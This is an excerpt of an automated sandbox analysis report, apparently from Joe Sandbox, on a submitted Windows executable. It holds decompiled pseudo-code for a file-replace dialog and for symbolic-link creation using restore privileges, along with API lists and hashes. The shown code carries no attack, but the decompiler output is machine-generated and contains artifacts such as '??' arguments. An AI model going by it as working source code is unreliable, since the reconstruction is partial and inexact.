                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                    • Instruction ID: 7047a7c49c397a36f661c657ce57c610b61bf05168a7205450f4a010cefadb91
                                                    • Opcode Fuzzy Hash: 3abf8698f24b160306dbfa8825a6738f30d59f68449f0b26a1f93a215c6d046a
                                                    • Instruction Fuzzy Hash: 2EA01130200280AB82000B328F0AB0EBAAAAFA2B00F00C028A00088030CB30C820EA02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 00CDC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E00CDC220(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
				struct _FILETIME _v0;
				struct _SYSTEMTIME _v12;
				struct _SYSTEMTIME _v16;
				struct _FILETIME _v24;
				void* _t74;
				void* _t137;
				long _t138;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				signed short _t148;
				void* _t149;
				void* _t150;
				intOrPtr _t152;
				signed int _t153;
				signed int _t157;
				struct HWND__* _t158;
				intOrPtr _t159;
				void* _t160;
				int _t162;
				int _t165;
				void* _t168;
				void* _t170;

				_t156 = __edx;
				E00CDEC50(0x1a50);
				_t148 = _a6748;
				_t159 = _a6744;
				_t158 = _a6740;
				if(E00CC1316(__edx, _t158, _t159, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t160 = _t159 - 0x110;
					if(_t160 == 0) {
						SetFocus(GetDlgItem(_t158, 0x6c));
						E00CD0602( &_a2640, _a6752, 0x800);
						E00CCC36E( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t158, 0x65,  &_a2616);
						 *0xd23074( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t158, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t162 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E00CC4092( &_a900, 0x200, L"%s %s %s", E00CCE617(0x99));
							_t170 = _t168 + 0x18;
							SetDlgItemTextW(_t158, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t150 = 0x200;
							} else {
								asm("adc eax, ebp");
								E00CDAF0F(0 + _a344, _a340,  &_a212, 0x32);
								_push(E00CCE617(0x98));
								_t150 = 0x200;
								E00CC4092( &_a884, 0x200, L"%s %s",  &_a192);
								_t170 = _t170 + 0x14;
								SetDlgItemTextW(_t158, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t158, 0x67, 0x170, _a1928, 0);
							_t152 =  *0xd08464; // 0x0
							E00CD138A(_t152, _t156,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t162,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E00CC4092( &_a896, _t150, L"%s %s %s", E00CCE617(0x99));
							_t168 = _t170 + 0x18;
							SetDlgItemTextW(_t158, 0x6b,  &_a896);
							_t153 =  *0xd1ec8c;
							_t157 =  *0xd1ec88;
							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
								E00CDAF0F(_t157, _t153,  &_a212, 0x32);
								_push(E00CCE617(0x98));
								E00CC4092( &_a884, _t150, L"%s %s",  &_a192);
								_t168 = _t168 + 0x14;
								SetDlgItemTextW(_t158, 0x69,  &_a884);
							}
						}
						L27:
						_t74 = 0;
						L28:
						return _t74;
					}
					if(_t160 != 1) {
						goto L27;
					}
					_t165 = 2;
					_t137 = (_t148 & 0x0000ffff) - _t165;
					if(_t137 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t165);
						L13:
						_t138 = SendDlgItemMessageW(_t158, 0x66, 0x171, 0, 0);
						if(_t138 != 0) {
							 *0xd230d0(_t138);
						}
						EndDialog(_t158, _t165);
						goto L1;
					}
					_t142 = _t137 - 0x6a;
					if(_t142 == 0) {
						_t165 = 0;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_t165 = 1;
						goto L13;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						_push(4);
						goto L12;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						goto L13;
					}
					_t146 = _t145 - 1;
					if(_t146 == 0) {
						_push(3);
						goto L12;
					}
					if(_t146 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t74 = 1;
				goto L28;
			}




























                                                    0x00cdc220
                                                    0x00cdc225
                                                    0x00cdc22b
                                                    0x00cdc234
                                                    0x00cdc23e
                                                    0x00cdc25d
                                                    0x00cdc267
                                                    0x00cdc26d
                                                    0x00cdc2e7
                                                    0x00cdc302
                                                    0x00cdc311
                                                    0x00cdc321
                                                    0x00cdc342
                                                    0x00cdc358
                                                    0x00cdc374
                                                    0x00cdc379
                                                    0x00cdc38c
                                                    0x00cdc39c
                                                    0x00cdc3a2
                                                    0x00cdc3a8
                                                    0x00cdc3a9
                                                    0x00cdc3ae
                                                    0x00cdc3b1
                                                    0x00cdc3b8
                                                    0x00cdc3d4
                                                    0x00cdc3de
                                                    0x00cdc3e6
                                                    0x00cdc404
                                                    0x00cdc409
                                                    0x00cdc417
                                                    0x00cdc41e
                                                    0x00cdc42c
                                                    0x00cdc492
                                                    0x00cdc42e
                                                    0x00cdc448
                                                    0x00cdc44c
                                                    0x00cdc45b
                                                    0x00cdc463
                                                    0x00cdc477
                                                    0x00cdc47c
                                                    0x00cdc48a
                                                    0x00cdc48a
                                                    0x00cdc4a7
                                                    0x00cdc4ad
                                                    0x00cdc4b8
                                                    0x00cdc4c7
                                                    0x00cdc4d7
                                                    0x00cdc4f1
                                                    0x00cdc509
                                                    0x00cdc513
                                                    0x00cdc51b
                                                    0x00cdc535
                                                    0x00cdc53a
                                                    0x00cdc548
                                                    0x00cdc556
                                                    0x00cdc55c
                                                    0x00cdc562
                                                    0x00cdc576
                                                    0x00cdc585
                                                    0x00cdc59c
                                                    0x00cdc5a1
                                                    0x00cdc5af
                                                    0x00cdc5af
                                                    0x00cdc562
                                                    0x00cdc5b5
                                                    0x00cdc5b5
                                                    0x00cdc5bb
                                                    0x00cdc5c1
                                                    0x00cdc5c1
                                                    0x00cdc272
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc27d
                                                    0x00cdc27e
                                                    0x00cdc280
                                                    0x00cdc2a4
                                                    0x00cdc2a4
                                                    0x00cdc2a6
                                                    0x00cdc2a6
                                                    0x00cdc2a7
                                                    0x00cdc2b1
                                                    0x00cdc2b9
                                                    0x00cdc2bc
                                                    0x00cdc2bc
                                                    0x00cdc2c4
                                                    0x00000000
                                                    0x00cdc2c4
                                                    0x00cdc282
                                                    0x00cdc285
                                                    0x00cdc2d9
                                                    0x00000000
                                                    0x00cdc2d9
                                                    0x00cdc287
                                                    0x00cdc28a
                                                    0x00cdc2d6
                                                    0x00000000
                                                    0x00cdc2d6
                                                    0x00cdc28c
                                                    0x00cdc28f
                                                    0x00cdc2d0
                                                    0x00000000
                                                    0x00cdc2d0
                                                    0x00cdc291
                                                    0x00cdc294
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc296
                                                    0x00cdc299
                                                    0x00cdc2cc
                                                    0x00000000
                                                    0x00cdc2cc
                                                    0x00cdc29e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc29e
                                                    0x00cdc25f
                                                    0x00cdc261
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CDC2B1
                                                    • EndDialog.USER32(?,00000006), ref: 00CDC2C4
                                                    • GetDlgItem.USER32(?,0000006C), ref: 00CDC2E0
                                                    • SetFocus.USER32(00000000), ref: 00CDC2E7
                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CDC321
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CDC358
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDC36E
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CDC38C
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC39C
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC3B8
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC3D4
                                                    • _swprintf.LIBCMT ref: 00CDC404
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CDC417
                                                    • FindClose.KERNEL32(00000000), ref: 00CDC41E
                                                    • _swprintf.LIBCMT ref: 00CDC477
                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CDC48A
                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CDC4A7
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00CDC4C7
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CDC4D7
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00CDC4F1
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CDC509
                                                    • _swprintf.LIBCMT ref: 00CDC535
                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CDC548
                                                    • _swprintf.LIBCMT ref: 00CDC59C
                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CDC5AF
                                                      • Part of subcall function 00CDAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                      • Part of subcall function 00CDAF0F: GetNumberFormatW.KERNEL32 ref: 00CDAF84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                    • API String ID: 797121971-1840816070
                                                    • Opcode ID: c4076ef636af2c711847cb9d7d3959c85af17feaca2ca79853c14c216070b606
                                                    • Instruction ID: cd1ebc94a721000d9124942cb92c8d98a5a3b800f47e1a861e9cf47a160ac87d
                                                    • Opcode Fuzzy Hash: c4076ef636af2c711847cb9d7d3959c85af17feaca2ca79853c14c216070b606
                                                    • Instruction Fuzzy Hash: 6391A172248349BBD2219BA0DC89FFB77ACEB5A700F04481AF749C2181DB75A605DB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CC6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 88%
                                                    			E00CC6FAA(void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t98;
				void* _t109;
				signed int _t112;
				intOrPtr _t117;
				signed int _t134;
				long _t154;
				void* _t182;
				void* _t186;
				void* _t190;
				void* _t194;
				short _t195;
				void* _t199;
				WCHAR* _t200;
				long _t201;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t229;
				intOrPtr* _t233;
				intOrPtr* _t234;
				void* _t236;
				intOrPtr _t237;
				signed int _t238;
				void* _t239;
				intOrPtr _t240;
				signed int _t242;
				intOrPtr _t244;
				short _t245;
				void* _t246;
				intOrPtr _t250;
				short _t252;
				void* _t253;
				void* _t255;
				void* _t256;

				E00CDEB78(_t98, _t253);
				E00CDEC50(0x30a8);
				if( *0xd01023 == 0) {
					E00CC7A9C(L"SeRestorePrivilege");
					E00CC7A9C(L"SeCreateSymbolicLinkPrivilege");
					 *0xd01023 = 1;
				}
				_t203 = _t253 - 0x2c;
				E00CC13BA(_t203, 0x1418);
				_t244 =  *((intOrPtr*)(_t253 + 0x10));
				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
				E00CD0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
				 *(_t253 - 0x14) = E00CE3E13(_t253 - 0x107c);
				_t236 = _t253 - 0x107c;
				_t199 = _t253 - 0x207c;
				_t109 = E00CE6088(_t236, L"\\??\\", 4);
				_t256 = _t255 + 0x10;
				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00CE6088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00CE6066(_t199, _t236);
				_t112 = E00CE3E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L11:
					E00CCA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00CCA231(_t200) != 0) {
						_t186 = E00CCA28F(E00CCA243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00CCA1E0();
						} else {
							E00CCA18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L20;
						}
						_t201 = 0;
						E00CC2021(__eflags, 0x14, 0, _t200);
						E00CC6D83(0xd01098, 9);
						goto L41;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L20:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L26:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00CE6066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00CE6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L27:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00CC9556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00CC7A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00CC9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00CC9620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00CCA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00CC959A(_t253 - 0x30b4);
											L41:
											E00CC15FB(_t253 - 0x2c);
											 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
											return _t201;
										}
										CloseHandle(_t239);
										E00CC2021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L32:
											__eflags = E00CD07BC();
											if(__eflags == 0) {
												E00CC15C6(_t253 - 0x7c, 0x18);
												E00CD15FE(_t253 - 0x7c);
											}
											L34:
											E00CC6DCB(0xd01098, __eflags);
											E00CC6D83(0xd01098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											L37:
											_t201 = 0;
											goto L41;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L34;
										}
										goto L32;
									}
									E00CC6C23(_t200);
									E00CC6D83(0xd01098, 9);
									goto L37;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L37;
								}
								goto L26;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00CE6066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00CE6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L27;
						}
						E00CC6C23(_t200);
						goto L37;
					}
				}
				if( *(_t253 - 0xd) != 0) {
					goto L37;
				}
				_t190 = E00CCBCC3(_t244 + 0x1104);
				_t269 = _t190;
				if(_t190 != 0) {
					goto L37;
				}
				_push(_t244 + 0x1104);
				_push(_t200);
				_push(_t244 + 0x28);
				_push(_t237);
				if(E00CC7861(_t269) == 0) {
					goto L37;
				}
				goto L11;
			}








































                                                    0x00cc6faa
                                                    0x00cc6fb4
                                                    0x00cc6fc0
                                                    0x00cc6fc7
                                                    0x00cc6fd1
                                                    0x00cc6fd6
                                                    0x00cc6fd6
                                                    0x00cc6fe5
                                                    0x00cc6fe8
                                                    0x00cc6fed
                                                    0x00cc6ff0
                                                    0x00cc7007
                                                    0x00cc701a
                                                    0x00cc701d
                                                    0x00cc7025
                                                    0x00cc7031
                                                    0x00cc7036
                                                    0x00cc703b
                                                    0x00cc703e
                                                    0x00cc7043
                                                    0x00cc7045
                                                    0x00cc7045
                                                    0x00cc704d
                                                    0x00cc7057
                                                    0x00cc705c
                                                    0x00cc7061
                                                    0x00cc7065
                                                    0x00cc7066
                                                    0x00cc706d
                                                    0x00cc7073
                                                    0x00cc7073
                                                    0x00cc7061
                                                    0x00cc7078
                                                    0x00cc7084
                                                    0x00cc7089
                                                    0x00cc708f
                                                    0x00cc7092
                                                    0x00cc709c
                                                    0x00cc70d6
                                                    0x00cc70e1
                                                    0x00cc70ee
                                                    0x00cc70f7
                                                    0x00cc70fc
                                                    0x00cc70ff
                                                    0x00cc7108
                                                    0x00cc7101
                                                    0x00cc7101
                                                    0x00cc7101
                                                    0x00cc70ff
                                                    0x00cc7114
                                                    0x00cc71e1
                                                    0x00cc71e3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc71ea
                                                    0x00cc71ef
                                                    0x00cc71fb
                                                    0x00000000
                                                    0x00cc7127
                                                    0x00cc7139
                                                    0x00cc7142
                                                    0x00cc7155
                                                    0x00cc715b
                                                    0x00cc715b
                                                    0x00cc7161
                                                    0x00cc7164
                                                    0x00cc7205
                                                    0x00cc7208
                                                    0x00cc7213
                                                    0x00cc7216
                                                    0x00cc7219
                                                    0x00cc721f
                                                    0x00cc7222
                                                    0x00cc7228
                                                    0x00cc722b
                                                    0x00cc7239
                                                    0x00cc723f
                                                    0x00cc724d
                                                    0x00cc7255
                                                    0x00cc7258
                                                    0x00cc725f
                                                    0x00cc7274
                                                    0x00cc7280
                                                    0x00cc7280
                                                    0x00cc7283
                                                    0x00cc7286
                                                    0x00cc729e
                                                    0x00cc72a0
                                                    0x00cc72a3
                                                    0x00cc72de
                                                    0x00cc72e0
                                                    0x00cc735d
                                                    0x00cc7369
                                                    0x00cc736d
                                                    0x00cc7372
                                                    0x00cc7375
                                                    0x00cc7386
                                                    0x00cc7399
                                                    0x00cc73ac
                                                    0x00cc73b7
                                                    0x00cc73c2
                                                    0x00cc73c7
                                                    0x00cc73ce
                                                    0x00cc73d4
                                                    0x00cc73d4
                                                    0x00cc73df
                                                    0x00cc73e1
                                                    0x00cc73e6
                                                    0x00cc73e9
                                                    0x00cc73f6
                                                    0x00cc73fe
                                                    0x00cc73fe
                                                    0x00cc72e3
                                                    0x00cc72ee
                                                    0x00cc72f3
                                                    0x00cc72f9
                                                    0x00cc72fc
                                                    0x00cc7305
                                                    0x00cc730a
                                                    0x00cc730c
                                                    0x00cc7313
                                                    0x00cc731b
                                                    0x00cc731b
                                                    0x00cc7320
                                                    0x00cc7327
                                                    0x00cc7330
                                                    0x00cc7335
                                                    0x00cc7338
                                                    0x00cc7339
                                                    0x00cc7340
                                                    0x00cc734a
                                                    0x00cc7342
                                                    0x00cc7342
                                                    0x00cc7342
                                                    0x00cc7350
                                                    0x00cc7350
                                                    0x00000000
                                                    0x00cc7350
                                                    0x00cc72fe
                                                    0x00cc7303
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc7303
                                                    0x00cc72ad
                                                    0x00cc72b6
                                                    0x00000000
                                                    0x00cc72b6
                                                    0x00cc720a
                                                    0x00cc720d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc720d
                                                    0x00cc716d
                                                    0x00cc7170
                                                    0x00cc7176
                                                    0x00cc7179
                                                    0x00cc717f
                                                    0x00cc7182
                                                    0x00cc7190
                                                    0x00cc7196
                                                    0x00cc71a4
                                                    0x00cc71ac
                                                    0x00cc71af
                                                    0x00cc71b6
                                                    0x00cc71cb
                                                    0x00000000
                                                    0x00cc71d0
                                                    0x00cc714a
                                                    0x00000000
                                                    0x00cc714a
                                                    0x00cc7114
                                                    0x00cc70a2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc70af
                                                    0x00cc70b4
                                                    0x00cc70b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc70c2
                                                    0x00cc70c3
                                                    0x00cc70c7
                                                    0x00cc70c8
                                                    0x00cc70d0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                    • _wcslen.LIBCMT ref: 00CC7013
                                                    • _wcslen.LIBCMT ref: 00CC7084
                                                      • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                      • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                      • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                      • Part of subcall function 00CCA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                      • Part of subcall function 00CCA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CC7139
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CC7155
                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CC7298
                                                      • Part of subcall function 00CC9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                      • Part of subcall function 00CC9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                      • Part of subcall function 00CC9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                      • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 2821348736-3508440684
                                                    • Opcode ID: 671ac035d0f10c9ce80a171122cc9f40c6f2af22e2294d7f5255637effa13b9c
                                                    • Instruction ID: 95114e75acfa216c9d21595b95490e12a13a6a2cf4e48eda25aeede841d1bbb5
                                                    • Opcode Fuzzy Hash: 671ac035d0f10c9ce80a171122cc9f40c6f2af22e2294d7f5255637effa13b9c
                                                    • Instruction Fuzzy Hash: FCC10771904644AADB21EB74CC45FFEB3A8EF04300F04465EFA5AE7282DB34AB44DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CED8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODECrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 68%
                                                    			E00CED8EE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v32;
				signed int _v36;
				char _v460;
				signed int _v464;
				void _v468;
				signed int _v472;
				signed int _v932;
				signed int _v936;
				signed int _v1392;
				signed int _v1396;
				signed int _v1400;
				char _v1860;
				signed int _v1864;
				signed int _v1865;
				signed int _v1872;
				signed int _v1876;
				signed int _v1880;
				signed int _v1884;
				signed int _v1888;
				signed int _v1892;
				signed int _v1896;
